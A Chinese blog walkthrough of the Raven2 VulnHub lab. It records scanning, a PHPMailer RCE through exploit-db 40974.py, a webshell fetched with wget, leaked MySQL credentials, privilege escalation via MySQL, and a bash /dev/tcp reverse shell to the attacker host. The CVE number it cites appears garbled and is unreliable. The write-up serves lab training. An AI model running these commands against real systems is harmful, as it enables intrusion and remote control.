内网安全 靶场攻略

Raven2提权靶场

Raven2提权靶场

1.信息收集

下载地址:https://www.vulnhub.com/entry/raven-2,269/

端口扫描 

1
2
3

fscan -h 192.168.214.1/24        		查找当前网段存活主机
nmap -p- -sV -sC -A 192.168.214.158    对目标主机进行端口探测
开放22,80等端口

目录扫描 

1

python dirsearch.py -u "http://192.168.214.158/"

1
2
3
4
5
6

发现存在wordpress和目录遍历
http://192.168.214.158/vendor/
通过README.md得知该站点部署有PHPMailerPHPMailer是一个用于发送电子邮件的PHP库,许多知名的 CMS 例如 Wordpress 等都是使用这个组件来发送邮件
http://192.168.214.158/vendor/VERSION 版本号5.2.16
http://192.168.214.158/vendor/PATH    网站目录/var/www/html/vendor/ 拿到第一个flag
通过SECURITY.md得知PHPMailer 5.2.18之前的版本存在RCECVE-2016-18833

2.获取权限 

1
2

既然知道PHPMailer存在RCE,使用MSF进行探测
searchsploit PHPMailer

image-20240522101807159

1
2
3
4

选择一个exp
find / -name 40974.py            查找对应文件位置
cp /usr/share/exploitdb/exploits/php/webapps/40974.py ./    复制文件到当前文件夹
更改target,反弹shell端口,目录地址

image-20240522102459624

1

python 40974.py

image-20240522102617379

1

访问后门文件成功反弹shell到kali

image-20240522104017685

1
2

python -c 'import pty; pty.spawn("/bin/bash")'           //交互式shell
wget http://192.168.214.156/bxshell.php                  //上传冰蝎后门

3.权限提升 

1
2
3

信息收集:查找配置文件,翻到数据库配置文件
使用冰蝎连接数据库
root/R@v3nSecurity

image-20240522104644702

1

使用冰蝎自带的端口转发将3306端口转发到本地13306

image-20240522105611082

1

navicat连接成功

image-20240522105641448

1

使用MDUT进行连接,成功提权

image-20240522105851311

1
2
3

root/$6$XNswnRYj$qbzk4XtCeqoyTyLih4vysAJE57xvx1GPyz.5yfOmdpaKMmUhSID.WQ.nvcxaoTMnSCQ8FuopUV2Q7AVNj5WXy

bash -i>& /dev/tcp/192.168.214.156/6666 0>&1
By Lsec
最后更新于 Sep 30, 2025 13:09 +0800
comments powered by Disqus
© 2025 - 2026 Lsec's Blog
使用 Hugo 构建
主题 StackJimmy 设计
¹鵵ҳ